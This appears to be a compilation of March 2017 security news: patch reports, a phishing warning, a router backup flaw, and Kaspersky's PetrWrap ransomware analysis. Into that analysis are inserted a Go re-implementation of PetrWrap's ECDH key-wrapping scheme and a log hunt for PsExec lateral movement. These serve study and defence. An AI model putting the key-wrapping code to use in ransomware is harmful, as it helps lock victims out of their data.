I naturally informed Asus of this. I first wrote the report in Czech (to the Czech branch) and was told that I had to write the request in English and that they would forward it to headquarters. To this day nobody has got back to me.

The lax approach is unpleasant, but economically understandable. The router was very cheap from the start of sales, so the manufacturer cannot be expected to spend more money on a practically dead and probably barely profitable product.

How the flaw was discovered
Let me explain how I found the flaw. It all began with a message from my former employer that went roughly: "someone hacked our router, you must have leaked the password somewhere". What led the employer to conclude the router had been hacked was a change in its state: the connection was slow and it was impossible to log in with the original password.

I quickly started thinking about how the password could have leaked. After ruling out other possibilities, I arrived at the backup file, which I had placed on the shared company storage together with instructions for returning the router to a "known" working state. So I downloaded the file and opened it in a text editor. I saw a heap of "spilled rice" and plenty of NULL, BEL, ETB, EOT and other control characters.

I wondered what could open it more sensibly, and in the end an ordinary hex editor was enough. I then started searching the backup file and very quickly began lamenting why anyone had programmed it so stupidly.

How it all turned out
Fortunately it has a happy ending. The employer had mixed up the versions of the document I had sent by e-mail; the versions with passwords stayed inside the company. The second version, without passwords, went to the cloud storage, which a few employees could access, something the employer controlled himself.

There was also a suspicion that the files had reached one of the friendly organisations operating in the same building. I checked, but that was not the case: only the edited version without the backups had been shared. So if the file leaked anywhere, it was probably the employer's fault.

In the end we bought a newer router, which was needed anyway. And we changed the password on the Asus, just to be safe.


Microsoft Finally Releases Security Patches For Publicly-Disclosed Critical Flaws
15.3.2017 thehackernews Vulnerability
After last month's postponement, Microsoft's Patch Tuesday is back with a massive release of fixes that includes patches for security vulnerabilities in Windows and associated software disclosed and exploited since January's patch release.
Meanwhile, Adobe has also pushed out security updates for its products, releasing patches for at least seven security vulnerabilities in its Flash Player software.
Microsoft patched a total of 140 separate security vulnerabilities across 18 security bulletins, nine of them rated critical because they allow remote code execution on the affected computer.
Microsoft Finally Patches Publicly Disclosed Windows Flaws
Among the critical updates is a fix for the SMB (Server Message Block) network file-sharing protocol, for which exploit code has been public since last month: Laurent Gaffié, who found a Windows SMB flaw last year, released a proof of concept in February. His bug is a memory corruption issue triggered when a Windows machine connects to a malicious SMB server; it affects all supported versions of Windows and lets a remote, unauthenticated attacker crash the system in a denial-of-service attack.
Microsoft's bulletin for its SMBv1 server fixes, released the same day, describes a more severe class of problem: "Remote code execution vulnerabilities exist in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerabilities could gain the ability to execute code on the target server. To exploit the vulnerability, in most situations, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv1 server."
Microsoft patched Gaffié's flaw but did not credit him.
Microsoft Also Patches Flaws Uncovered By Google
Another critical bulletin (MS17-013) addresses a dozen serious flaws in the Windows Graphics Component (GDI library), which is also used by Office, Skype, Lync and Silverlight.
The flaws lie in the way Windows handles certain image files. An attacker can achieve remote code execution on your system by getting you to visit a booby-trapped website or open a malicious document; no further user interaction is needed.
Google's Project Zero disclosed one of these flaws, with a proof-of-concept exploit, late last month, before Microsoft had fixed it.
All supported releases of Microsoft Windows back to Windows Vista are vulnerable. Microsoft originally patched the issue in June last year, but that patch was incomplete.
Microsoft also patched seven other critical flaws, including two cumulative updates for Internet Explorer and the Edge browser, and nine rated important.
In late February, Google's Project Zero also publicly disclosed details and a proof-of-concept exploit for a code execution flaw in Microsoft's Internet Explorer and Edge browsers; the proof of concept crashes the browsers.
Meanwhile, Adobe also released patches for its Flash Player software for Windows, Macintosh, Linux and Chrome OS.
Users are advised to apply Windows as well as Adobe patches to keep away hackers and cybercriminals from taking control over your computer.


PetrWrap, a Petya-based ransomware, was used in targeted attacks
15.3.2017 securityaffairs Virus

Threat actors have found a way to hijack the Petya ransomware on the fly and use it in targeted attacks: meet PetrWrap.
The Petya ransomware was first spotted by researchers at Trend Micro a year ago; it overwrites the master boot record (MBR) to lock users out of infected machines.

Petya replaces the MBR with malicious code and forces a blue screen of death (BSoD); on the following reboot, that code encrypts the drive's master file table (MFT).

When the victim then tries to boot, the OS cannot load, even in Safe Mode. Instead, users turning on the computer are shown a flashing red and white screen with a skull and crossbones.


Petya is offered under a ransomware-as-a-service (RaaS) model, but the PetrWrap attackers bypass it: they developed a module that patches the original Petya "on the fly".

The attackers first compromise the target organization's network, then use the PsExec tool to install the ransomware on all endpoints and servers.

The Petya variant used in these attacks was dubbed PetrWrap.

“The PetrWrap Trojan is written in C and compiled in MS Visual Studio. It carries a sample of the Petya ransomware v3 inside its data section and uses Petya to infect the victim’s machine.” reads the analysis published by Kaspersky. “What’s more, PetrWrap implements its own cryptographic routines and modifies the code of Petya in runtime to control its execution. This allows the criminals behind PetrWrap to hide the fact that they are using Petya during infection.”


The authors of PetrWrap devised a method to force Petya to use an encryption key different from the one hardcoded by its original creators.

Using this mechanism, the attackers can decrypt the victims' disks at any time. PetrWrap also removes all mentions of Petya from the ransom message, as well as its flashing red ASCII-art skull.

Why do hackers hijack the Petya ransomware?

First, because the attackers don't need to write ransomware from scratch; second, because the Petya version they used is stable and not affected by major flaws.

The bad news for victims is that there is currently no recovery tool to decrypt the MFT of disk volumes infected by Petya. The experts note, however, that because this ransomware doesn't encrypt file contents, files can be reconstructed from the raw disk data with specialized recovery tools.

Summarizing, the PetrWrap ransomware achieves the following goals:
The victim's machine is locked and the MFT of NTFS partitions is encrypted securely (because Petya v3, which is used in this attack, doesn't have the flaws of the earlier versions and implements Salsa20 correctly);
The lockscreen doesn't show the flashing skull animation and doesn't contain any mention of Petya, which makes it harder to assess the situation and determine the extent of the damage;
The developers of PetrWrap didn't have to write the low-level bootloader code and risk making mistakes similar to those observed in earlier versions of Petya.


Security updates fix critical vulnerabilities in Flash player and Shockwave player
15.3.2017 securityaffairs Vulnerability

Adobe patches vulnerabilities in Flash Player and Shockwave for Windows, Mac, Linux and Chrome OS.
Adobe issued security updates for Flash Player and Shockwave Player products. The security updates released by the company on Tuesday address seven vulnerabilities in Flash Player and one flaw in Shockwave Player.

The Flash Player 25.0.0.127 version fixes critical security vulnerabilities that affect version 24.0.0.221 and earlier on Windows, Mac, Linux and Chrome OS.

The flaws could be exploited by an attacker to gain control over the vulnerable system.

“Adobe has released security updates for Adobe Flash Player for Windows, Macintosh, Linux and Chrome OS. These updates address critical vulnerabilities that could potentially allow an attacker to take control of the affected system. ” reads the security advisory published by Adobe.

The list of vulnerabilities addressed by the security updates includes a buffer overflow (CVE-2017-2997), two memory corruption issues (CVE-2017-2998, CVE-2017-2999), a random number generator flaw (CVE-2017-3000), and three use-after-free vulnerabilities (CVE-2017-3001, CVE-2017-3002, CVE-2017-3003).

Adobe thanked the following researchers for reporting the flaws:

Tao Yan (@Ga1ois) of Palo Alto Networks (CVE-2017-2997, CVE-2017-2998, CVE-2017-2999)
Wang Chenyu and Wu Hongjun of Nanyang Technological University (CVE-2017-3000)
Yuki Chen of Qihoo 360 Vulcan Team working with Chromium Vulnerability Rewards Program and Anonymous working with Trend Micro’s Zero Day Initiative (CVE-2017-3001)
Yuki Chen of Qihoo 360 Vulcan Team working with Chromium Vulnerability Rewards Program (CVE-2017-3002, CVE-2017-3003)

The security updates also fixed an important privilege escalation flaw in Shockwave Player (CVE-2017-2983) related to the directory search path used to find resources.

The flaw was discovered by Nitesh Shilpkar.

According to Adobe, there is no evidence that vulnerabilities fixed by the security updates have been exploited by threat actors in the wild.


"You face enforcement proceedings": fraudsters dust off an old trick

15.3.2017 Novinky/Bezpečnost Crime
People should be on their guard against e-mails in which cyber fraudsters pose as employees of an enforcement (bailiff's) office. A flood of them has appeared in recent days, warns the national security team CSIRT.CZ, operated by the CZ.NIC association.
"In the past few days a fraudulent e-mail has been recorded that demands payment of an outstanding amount and threatens possible enforcement proceedings," noted Pavel Bašta, security analyst at CSIRT.CZ.

According to him, the cybercriminals are using this route to lure the gullible onto fraudulent websites. "Besides detailed instructions for paying the supposed debt, it also sends the user to a web page imitating the real site of one of the enforcement offices, where they are led to download and run malware," Bašta stressed.

The attackers' motivation is thus clear. On the one hand they try to extract money from trusting recipients under the threat of enforcement; on the other they want to smuggle an uninvited guest, a computer virus, onto the victims' computers.

Do not click links, do not open attachments
"The link leads to the domain exekutor.site instead of executor.cz. Among other things, the body of the e-mail recommends disregarding antivirus warnings," the security analyst added. It should be noted, however, that the fraudulent messages may just as well be sent from entirely different addresses.

The enforcement office has already distanced itself from the fraudulent messages. "Do not open the attachments and do not click the links contained in this fraudulent e-mail. Our office never sends notices by e-mail, only on paper or via the data box (datová schránka) system," representatives of the Chamber of Enforcement Officers (Exekutorská komora) stated.

Cyber pirates tried a practically identical trick with an enforcement notice two years ago. At that time the Czech internet was flooded with literally thousands of fraudulent e-mails in which cybercriminals urged recipients to pay non-existent debts.


Hacker partially breaks the security of the new Nintendo Switch console; an outdated WebKit is to blame
15.3.2017 Novinky/Bezpečnost Security

Less than a month after official sales of Nintendo's new Switch console began, hackers have managed to partially break ("jailbreak") its security and gain access to the console's internal systems.
The successful hack, a prerequisite for a full jailbreak, was announced on Twitter by the hacker known as qwertyoruiop, who posted a photo of the word "done" displayed in the Nintendo Switch browser. That browser is so far hidden in the system and is used only for tasks such as connecting to public Wi-Fi hotspots. The problem is that it is built on a six-month-old WebKit, so it lacks the fixes for bugs found during that period, and those are the bugs the attacker used to break in.

qwertyoruiop (@qwertyoruiopz), 11 Mar 2017, 4:36 AM: "that's just how it goes"

He even used the same tools as for iOS, where Apple had already fixed the same Safari bug in iOS 9.3.5. Although this is not yet a complete jailbreak, it can be expected that this bug will serve as a stepping stone to further layers and eventually to obtaining "root" and full control of the system. It would then be possible to run applications that Nintendo has not approved and that have not passed through its app store, such as emulators and, eventually, pirated versions of games.

We will see how Nintendo deals with this problem, but it is certain that, as with other closed-model systems (iOS devices, Sony's and Microsoft's game consoles, and so on), hackers will keep trying to find new holes and exploit them to gain complete control over the device.


Cybercrime is establishing itself ever more as a business

15.3.2017 SecurityWorld Crime
Computer security experts met in Prague at the IDC Security Roadshow 2017 conference to discuss current trends in cyber threats in the context of developments in information and communication technology.
Businesses and public institutions today face a broad spectrum of cybersecurity threats of varying intensity and scale. Far more often than before, these threats are financially or espionage motivated; politically motivated attacks are also on the rise, and the volume of resources available to attackers keeps growing.

"Cybercriminals run their activity as a business, and breaking through security is a business objective for them. Like any other business, they invest resources in meeting their goals and try to grow their enterprise," says Mark Child, lead analyst for cybersecurity at IDC's Prague office.

"Businesses and organizations today cannot sit with folded arms waiting for a security incident or a network intrusion; they must take an active stance on defense and hunt for threat indicators," Mark Child explains. "The traditional approach based on signatures of known malware or attack patterns still has its place, but it must be combined with new methods based on machine learning and artificial intelligence."

According to an IDC survey, price remains the main criterion for businesses when choosing a supplier of security products and solutions, ahead of factors such as the supplier's experience in the field, references, certifications, and the range of functions or services offered. At the same time, 30% of organizations do not measure the effectiveness of their IT security spending at all.


Microsoft Patches Many Exploited, Disclosed Flaws

15.3.2017 securityweek Vulnerability

Microsoft has released a total of 18 security bulletins to address dozens of vulnerabilities, including more than a dozen that have already been publicly disclosed or exploited in attacks.

The March 2017 updates also include the patches that should have been released last month. Microsoft postponed most of the February security updates – except the updates that fixed Flash Player flaws – due to an unspecified “last minute issue.”

The latest security updates patch critical and important vulnerabilities in Windows, Edge, Internet Explorer, Office, Skype, Lync and Silverlight.

The advisories published by Microsoft show that 12 of the vulnerabilities have been publicly disclosed, including an SMB-related denial-of-service (DoS) flaw in Windows (CVE-2017-0016), a Windows kernel privilege escalation (CVE-2017-0050), a remote code execution bug in a graphics component (CVE-2017-0014), a DoS issue in Office (CVE-2017-0029), and a Hyper-V DoS vulnerability (CVE-2017-0097).

The list of flaws whose details have been made public also includes information disclosure vulnerabilities in Edge (CVE-2017-0065) and Internet Explorer (CVE-2017-0008), several spoofing flaws in the two web browsers (CVE-2017-0012, CVE-2017-0033, CVE-2017-0069), and memory corruption and privilege escalation issues in Internet Explorer (CVE-2017-0037, CVE-2017-0154).

In February, Google Project Zero disclosed the details of a medium-severity information disclosure flaw affecting the Windows Graphics Device Interface (GDI). The security hole, tracked as CVE-2017-0038, has been addressed, but Microsoft’s advisory erroneously shows that it has not been disclosed.

There are three vulnerabilities that, according to Microsoft, have been exploited in attacks before patches were made available.

One of them is CVE-2017-0149, a memory corruption vulnerability affecting Internet Explorer. The weakness allows an attacker to execute arbitrary code in the context of the current user by getting the target to access a specially crafted website or open a malicious email attachment.

Another zero-day is CVE-2017-0005, a privilege escalation vulnerability caused by the way the Windows GDI component handles objects in memory. The flaw allows an authenticated attacker to run arbitrary code in kernel mode, Microsoft said.

The third zero-day has been described as an XML Core Services information disclosure vulnerability (CVE-2017-0022), which allows an attacker to test for the presence of files on the disk.

Microsoft has not shared any information on the attacks involving these zero-days, but security firms could provide more details in the upcoming days.

Adobe released security updates on Tuesday to address a total of eight vulnerabilities in Flash Player and Shockwave Player. One of the bulletins released by Microsoft addresses the Flash Player flaws in the libraries used by Internet Explorer and Edge.

Microsoft intends to stop publishing security bulletins and instead provide security update information on the new Security Update Guide website. However, in an effort to make the transition easier for customers, the company has published security bulletins as well this month.


Decryption Tool Released for FindZip macOS Ransomware

15.3.2017 securityweek Virus

macOS users who had their systems infected with the FindZip ransomware can now use a decryption tool to restore their files without paying the ransom.

The ransomware was spotted last month by ESET, which detects it as OSX/Filecoder.E. An update to Apple's XProtect signatures, however, started calling it FindZip soon after. Spreading through piracy sites, the threat masquerades as cracks for Adobe Premiere Pro and Microsoft Office, and the samples are also code-signed, though not with an Apple-issued certificate.

FindZip is only the second piece of ransomware to target Mac users, but that doesn’t make it less destructive. In fact, the security researchers who analyzed the malware said at the time that victims had no way of recovering their files, because the malware was destroying the encryption key before attempting to communicate with the command and control server to send it to the attacker.

Because of that, the researchers recommended that users should not pay the ransom, as the attackers were believed to have no means of restoring encrypted files. However, while the recommendation remains, it appears that victims can recover their data, and can do so for free.

At the end of February, Malwarebytes Labs researchers published a post about how victims could restore their data using Xcode or TextWrangler, Xcode command-line tools, pkcrack source code, and both the encrypted and unencrypted versions of a file. A second computer or a different account on the compromised machine was also required, along with some technical knowledge.

Courtesy of Avast's FindZip decryption tool, however, things are a bit simpler, and users can decrypt their files on either a Mac or a Windows machine. Victims who copy their encrypted files from the Mac to a Windows machine need no additional software to install and run the decryptor, the researchers say.

On Mac or Linux, however, a compatibility layer for Windows applications is required; the tool has been tested with CrossOver and Wine, though Avast says other such programs might work as well. The decryption tool was tested on macOS 10.10 (Yosemite) and macOS 10.12 (Sierra).

Victims first need to install a windowing system for Mac, such as XQuartz, which Wine for Mac requires. If Wine was installed before the infection, chances are that its files were encrypted too, and users are advised to delete the folder /Users/<YourUserName>/.wine (that is, ~/.wine) before running the decryptor.

When running the decryption tool, users might be prompted to install Mono, or Gecko, and Avast notes that they should hit Cancel if Mono is requested. After getting the application running, users will be required to select a location for the decrypted files, as well as a pair of original/encrypted files. At this point, they only need to wait for the tool to find the decryption password, and then start the recovery process. Users are advised to also opt-in to having the encrypted files backed up first.


PetrWrap: the new Petya-based ransomware used in targeted attacks
14.3.2017 Kaspersky Virus

This year we found a new family of ransomware used in targeted attacks against organizations. After penetrating an organization's network the threat actors used the PsExec tool to install ransomware on all endpoints and servers in the organization. The next interesting fact about this ransomware is that the threat actors decided to use the well-known Petya ransomware to encrypt user data. As you may know, this family of ransomware has a RaaS model, but the threat actor decided not to use it. To get a workable version of the ransomware, the group behind PetrWrap created a special module that patches the original Petya ransomware "on the fly". This is what makes this new malware so unique.

Tech details

The PetrWrap Trojan is written in C and compiled in MS Visual Studio. It carries a sample of the Petya ransomware v3 inside its data section and uses Petya to infect the victim’s machine. What’s more, PetrWrap implements its own cryptographic routines and modifies the code of Petya in runtime to control its execution. This allows the criminals behind PetrWrap to hide the fact that they are using Petya during infection.

Modus operandi

After being launched PetrWrap delays its execution (sleeps for 5400 seconds = 1.5 hours). After that it decrypts the main DLL of Petya from its data section and gets ready to call its exported function ZuWQdweafdsg345312. This function normally prepares Petya for further operations and starts the MBR overwrite process. PetrWrap, however, needs to hook a couple of Petya’s functions first, so it replaces the instructions that call Petya’s DllEntryPoint with NOPs (hex bytes 0x90). This prevents Petya from proceeding on its own and allows PetrWrap to make all the necessary computations and preparations before letting it continue.

 

Main function of PetrWrap

After that PetrWrap makes the necessary cryptographic computations (we’ll discuss them in more detail below), hooks two Petya procedures (which are responsible for the generation of the configuration data, dubbed petya_generate_config, and for the MBR overwrite process, dubbed petya_infect) and then passes the execution to Petya. For more information on what the original Petya was capable of, please see our previous publication.

Cryptographic scheme

Normally, Petya generates a 16-byte key and uses the Salsa20 cipher to encrypt the MFT of the NTFS partitions found on local drives. To make decryption possible only for its operators, it uses the Elliptic Curve Diffie-Hellman (ECDH) key agreement algorithm with the curve secp192k1 and a public key embedded in Petya's body.

The criminals behind PetrWrap faced a problem: if they used Petya as is, they would be unable to decrypt the victim’s machine because they would need the Petya operators’ private key. So what they decided to do was to completely replace the ECDH part of Petya with their own independent implementation and use their own private and public keys.

PetrWrap's implementation uses cryptographic routines from OpenSSL (whereas Petya used the mbedtls library) and proceeds as follows:

The Trojan contains an embedded public key master_pub (a point on the curve prime192v1, which again differs from the curve chosen by Petya);
During each infection PetrWrap generates a new pair of session keys ec_session_priv + ec_session_pub;
Computes ecdh_shared_digest = SHA512(ECDH(master_pub, ec_session_priv));
'Intercepts' the salsa key generated by Petya and encrypts it using ecdh_shared_digest (there are a number of semi-useless manipulations which come down to essentially encrypting the salsa key with AES-256, using different parts of ecdh_shared_digest as the key and IV);
Constructs user_id, a string representation that contains the encrypted salsa key and ec_session_pub;
Passes this user_id to Petya, which uses it as if it were its own data (puts it into the configuration for the bootloader to be shown to the user after the PC reboots).
 

The ECDH shared key computation implemented in PetrWrap
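The key-wrapping scheme described above, re-implemented in Go as an added illustration. This is not PetrWrap's code or Kaspersky's; it shows the mechanics of wrapping Petya's Salsa20 key under the operators' ECDH key and why only the PetrWrap operators, not Petya's, can unwrap it. Assumptions that are not in the report: Go's standard library has no P-192, so P-256 stands in for prime192v1; a single pass of AES-256-CTR keyed with digest[0:32] and IV digest[32:48] stands in for the "semi-useless manipulations"; and the user_id layout (hex session public key, a dash, hex ciphertext) is invented here.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha512"
	"encoding/hex"
	"errors"
	"fmt"
	"math/big"
	"strings"
)

var curve = elliptic.P256() // stands in for prime192v1: Go ships no P-192 (assumption)

// genKey returns a fresh private scalar and public point; rand failure is fatal.
func genKey() ([]byte, *big.Int, *big.Int) {
	priv, x, y, err := elliptic.GenerateKey(curve, rand.Reader)
	if err != nil {
		panic(err)
	}
	return priv, x, y
}

// ecdhDigest = SHA512(ECDH(peerPub, priv)): x of priv*peerPub, fixed-width, hashed.
func ecdhDigest(peerX, peerY *big.Int, priv []byte) [sha512.Size]byte {
	x, _ := curve.ScalarMult(peerX, peerY, priv)
	shared := make([]byte, (curve.Params().BitSize+7)/8)
	x.FillBytes(shared)
	return sha512.Sum512(shared)
}

// aesCTR applies AES-256-CTR under key/iv (the exact mode used by PetrWrap is an assumption).
func aesCTR(key, iv, in []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	out := make([]byte, len(in))
	cipher.NewCTR(block, iv).XORKeyStream(out, in)
	return out, nil
}

// WrapSalsaKey is the infection side (wrap_generate_config): new session pair, digest
// against master_pub, AES-256 with key digest[0:32] and IV digest[32:48], then user_id.
func WrapSalsaKey(masterX, masterY *big.Int, salsaKey []byte) (string, error) {
	if len(salsaKey) != 16 {
		return "", errors.New("Petya's Salsa20 key is 16 bytes")
	}
	sessPriv, sessX, sessY := genKey()
	d := ecdhDigest(masterX, masterY, sessPriv)
	enc, err := aesCTR(d[:32], d[32:48], salsaKey)
	if err != nil {
		return "", err
	}
	return hex.EncodeToString(elliptic.Marshal(curve, sessX, sessY)) + "-" + hex.EncodeToString(enc), nil
}

// UnwrapSalsaKey is the operator side: only master_priv rebuilds the digest from
// ec_session_pub, which is why Petya's own operators cannot decrypt these victims.
func UnwrapSalsaKey(masterPriv []byte, userID string) ([]byte, error) {
	parts := strings.Split(userID, "-")
	if len(parts) != 2 {
		return nil, errors.New("malformed user_id")
	}
	sessPub, err1 := hex.DecodeString(parts[0])
	enc, err2 := hex.DecodeString(parts[1])
	sessX, sessY := elliptic.Unmarshal(curve, sessPub)
	if err1 != nil || err2 != nil || sessX == nil {
		return nil, errors.New("user_id is not hex or the session key is not on the curve")
	}
	d := ecdhDigest(sessX, sessY, masterPriv)
	return aesCTR(d[:32], d[32:48], enc)
}

// Demo: operator master pair, one infection, recovery with the master key, and the failed recovery anyone else gets.
func Demo(salsaKey []byte) (withMaster, withOtherKey bool, err error) {
	masterPriv, masterX, masterY := genKey()
	otherPriv, _, _ := genKey()
	userID, err := WrapSalsaKey(masterX, masterY, salsaKey)
	if err != nil {
		return false, false, err
	}
	got, err := UnwrapSalsaKey(masterPriv, userID)
	if err != nil {
		return false, false, err
	}
	wrong, err := UnwrapSalsaKey(otherPriv, userID)
	if err != nil {
		return false, false, err
	}
	return bytes.Equal(got, salsaKey), bytes.Equal(wrong, salsaKey), nil
}

func main() {
	ok, wrong, err := Demo([]byte("0123456789abcdef")) // constructed 16-byte key
	if err != nil {
		panic(err)
	}
	fmt.Printf("master key recovers Salsa20 key: %v; unrelated key recovers it: %v\n", ok, wrong)
}
```

The design point is the one the report makes: the wrapped key travels in the user_id shown on the lockscreen, so anyone can read ec_session_pub and the ciphertext, but the shared digest needs either ec_session_priv (discarded on the victim) or master_priv (held only by PetrWrap's operators). Swapping in their own master_pub is all the attackers needed to cut Petya's authors out of the payment loop.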

Hooked procedures

PetrWrap hooks two procedures in Petya which we will call petya_infect and petya_generate_config and replaces them with its own procedures dubbed wrap_infect and wrap_generate_config.

wrap_infect implements the following functionality:

saves the salsa key generated by Petya for further use;
patches the Petya bootloader code and ransom text in order to skip the flashing skull animation and to wipe all mention of Petya in the ransom message;
passes execution to the original petya_infect procedure.
wrap_generate_config in turn does the following:

calls the original petya_generate_config procedure;
generates the user_id string according to the algorithm described in the previous paragraph;
replaces Petya’s id string with this newly generated user_id.
 

The screen of the infected machine

Technical summary

As a result of all the manipulations described above, PetrWrap achieves the following goals:

The victim's machine is locked and the MFT of NTFS partitions is encrypted securely (because Petya v3, which is used in this attack, doesn't have the flaws of the earlier versions and implements Salsa20 correctly);

The lockscreen doesn't show the flashing skull animation and doesn't contain any mention of Petya, which makes it harder to assess the situation and determine the extent of the damage;

The developers of PetrWrap didn't have to write the low-level bootloader code and risk making mistakes similar to those observed in earlier versions of Petya.

Decryption

Unfortunately, this family of ransomware uses a strong, correctly implemented encryption scheme, so a decryption tool is out of the question. However, because Petya encrypts the MFT rather than the file contents, victims can try restoring files using third-party recovery tools such as R-Studio.

Detection

Kaspersky products successfully detect this ransomware as Trojan-Ransom.Win32.PetrWrap and PDM:Trojan.Win32.Generic.

Conclusion

Targeted attacks on organizations with the main aim of encrypting data are becoming more popular. The groups using ransomware in their targeted attacks usually try to find vulnerable servers or servers with unprotected RDP access. After penetrating an organization's network they use tools like Mimikatz to obtain the credentials needed to install ransomware throughout the network. To protect against such attacks, organizations need to keep their server software up to date, use strong passwords for remote access systems, install security solutions on their servers and use security solutions with behavioral detection components on their endpoints.
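An added example in Go (not Kaspersky's code) of the detection side of this conclusion: a hunt over Windows System-log service installation events for the PsExec fan-out the report describes, where one operator pushes a payload to every host. Assumptions not taken from the report: the rows are a constructed, flattened CSV rendering of event 7045 ("A service was installed in the system") plus one 7036 state change; PsExec's default service name is PSEXESVC; and the second rule, one account installing the same new service on several hosts within one log batch, is this example's own heuristic for catching a PsExec service renamed with "-r".

```go
package main

import (
	"encoding/csv"
	"fmt"
	"sort"
	"strings"
)

// Constructed sample (not from the report): Windows System-log service events
// flattened to EventID,Computer,ServiceName,ImagePath,Account. 7045 is "A service
// was installed in the system"; 7036 is a service state change. WinUpdSvc plays a
// PsExec service renamed with -r; gupdate is a benign single-host install.
const sampleServiceLog = `EventID,Computer,ServiceName,ImagePath,Account
7045,WS-01,PSEXESVC,%SystemRoot%\PSEXESVC.exe,CORP\svc_backup
7045,WS-02,PSEXESVC,%SystemRoot%\PSEXESVC.exe,CORP\svc_backup
7045,SRV-FILE01,PSEXESVC,%SystemRoot%\PSEXESVC.exe,CORP\svc_backup
7045,WS-03,WinUpdSvc,%SystemRoot%\WinUpdSvc.exe,CORP\svc_backup
7045,WS-04,WinUpdSvc,%SystemRoot%\WinUpdSvc.exe,CORP\svc_backup
7045,WS-05,WinUpdSvc,%SystemRoot%\WinUpdSvc.exe,CORP\svc_backup
7045,WS-09,gupdate,C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /svc,LocalSystem
7036,WS-01,PSEXESVC,,
`

type ServiceEvent struct {
	EventID, Computer, ServiceName, ImagePath, Account string
}

// ParseServiceLog reads the flattened CSV rendering above, skipping the header row.
func ParseServiceLog(raw string) ([]ServiceEvent, error) {
	rows, err := csv.NewReader(strings.NewReader(raw)).ReadAll()
	if err != nil || len(rows) == 0 {
		return nil, err
	}
	events := make([]ServiceEvent, 0, len(rows)-1)
	for _, r := range rows[1:] {
		events = append(events, ServiceEvent{r[0], r[1], r[2], r[3], r[4]})
	}
	return events, nil
}

// IsPsExecService flags a newly installed service named PSEXESVC or whose image
// is PSEXESVC.exe, PsExec's defaults. "psexec -r <name>" defeats this rule alone.
func IsPsExecService(e ServiceEvent) bool {
	if e.EventID != "7045" {
		return false
	}
	return strings.EqualFold(e.ServiceName, "PSEXESVC") ||
		strings.Contains(strings.ToUpper(e.ImagePath), "PSEXESVC.EXE")
}

// MassServiceInstalls groups 7045 events by service name and installing account
// and returns those seen on at least minHosts distinct computers, hosts sorted:
// the fan-out signature of one operator pushing a payload everywhere at once.
func MassServiceInstalls(events []ServiceEvent, minHosts int) map[string][]string {
	seen := map[string]map[string]bool{}
	for _, e := range events {
		if e.EventID != "7045" {
			continue
		}
		key := e.ServiceName + " by " + e.Account
		if seen[key] == nil {
			seen[key] = map[string]bool{}
		}
		seen[key][e.Computer] = true
	}
	out := map[string][]string{}
	for key, hosts := range seen {
		if len(hosts) < minHosts {
			continue
		}
		list := make([]string, 0, len(hosts))
		for h := range hosts {
			list = append(list, h)
		}
		sort.Strings(list)
		out[key] = list
	}
	return out
}

func main() {
	events, err := ParseServiceLog(sampleServiceLog)
	if err != nil {
		panic(err)
	}
	for _, e := range events {
		if IsPsExecService(e) {
			fmt.Printf("PsExec service installed on %s by %s\n", e.Computer, e.Account)
		}
	}
	for key, hosts := range MassServiceInstalls(events, 3) {
		fmt.Printf("service %s installed on %d hosts: %s\n", key, len(hosts), strings.Join(hosts, ", "))
	}
}
```

On the sample, the name rule catches the three PSEXESVC installs but misses the renamed WinUpdSvc; the fan-out rule catches both services and leaves the single-host gupdate alone. In production the grouping window would be time-bounded and the threshold tuned to how the organization actually deploys software.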

Sample MD5

17c25c8a7c141195ee887de905f33d7b – Trojan-Ransom.Win32.PetrWrap.b


SAP Patches Five Vulnerabilities in HANA Database Platform

14.3.2017 securityweek Vulnerability

SAP this week released another set of monthly security updates to address various issues in its products, including five vulnerabilities in SAP HANA, one of which was rated Hot News.

The March 2017 SAP Security Patch Day includes 25 security notes, SAP announced. Additionally, there were two updates to previously released security notes, for a total of 27 SAP Security Notes released this month. One Security Note has a Very High priority rating, while seven others were rated High.

According to ERPScan, a company that specializes in securing SAP and Oracle applications, the patch update includes 35 SAP Notes (28 SAP Security Patch Day Notes and 7 Support Package Notes), with 4 of the Notes released after the second Tuesday of the previous month, and 7 Notes being updates to previously released Security Notes.

The most important of the issues addressed this month was a Missing Authorization Check vulnerability in the SAP HANA User Self-Service. With a CVSS score of 9.8 (Very High), this critical bug could allow an attacker to take control of the affected system, SAP’s Holger Mack reveals.

The Self Service tool for SAP HANA provides the option to activate features such as password change, forgotten password reset, or user self-registration. The Hot News vulnerability could allow an unauthenticated attacker to impersonate other users, even those of high privileged accounts, security technology firm Onapsis explains. The attacker could take full control of the SAP HANA platform remotely.

According to SAP, however, the issue only affects customers who enabled the optional User Self Service component (it is disabled by default) and exposed it to an untrusted network. “The security note contains instructions on how to check if the User Self Service tool is enabled and how to protect the system by either updating or deactivating the affected service (if not needed anymore or as temporary measure),” Mack says.

With a CVSS score of 8.8 (High risk), the second most important flaw addressed this month (also discovered by Onapsis) was affecting SAP HANA as well: a session fixation vulnerability in SAP HANA extended application services, classic model. By exploiting it, an authenticated attacker could predict valid session IDs for concurrent users that are logged on to the system.

The remaining three vulnerabilities in SAP HANA were also found by Onapsis: two SQL Injection vulnerabilities with a CVSSv3 Base Score of 2.7, and an information disclosure in SAP HANA Cockpit for offline administration, with a CVSSv3 Base Score of 4.9.

“The risk of these SAP HANA vulnerabilities is critical indeed. However, the likelihood of mass-exploitation is low, as SAP HANA User Self-Service is enabled on only 13% of internet-exposed SAP systems (according to a custom scan). There are numerous other services in SAP HANA which are not enabled by default and are susceptible to critical issues. For example, last month we helped SAP to close a vulnerability with the same risk of remote authentication bypass, but in another web service dubbed Sinopia,” Alexander Polyakov, CTO at ERPScan, says.

In addition to the aforementioned bug in SAP HANA, the High risk flaws patched this month include a Remote Code Execution (RCE) vulnerability in SAP GUI for Windows, Denial of service (DOS) in Visual Composer, Denial of service (DOS) in SAP Netweaver Dynpro Engine, Improved security for HTTP URL outgoing connections in SAP Netweaver, and an update to a previous Security Note.

The RCE (CVSS Base Score: 8.0) and two DOS flaws (CVSS Base Score: 7.5 each) were found by ERPScan, along with a Cross-Site Scripting (XSS) vulnerability in SAP Enterprise Portal (CVSS Base Score: 6.1) and a Denial of service vulnerability in SAP Java Script Engine (CVSS Base Score: 2.7).

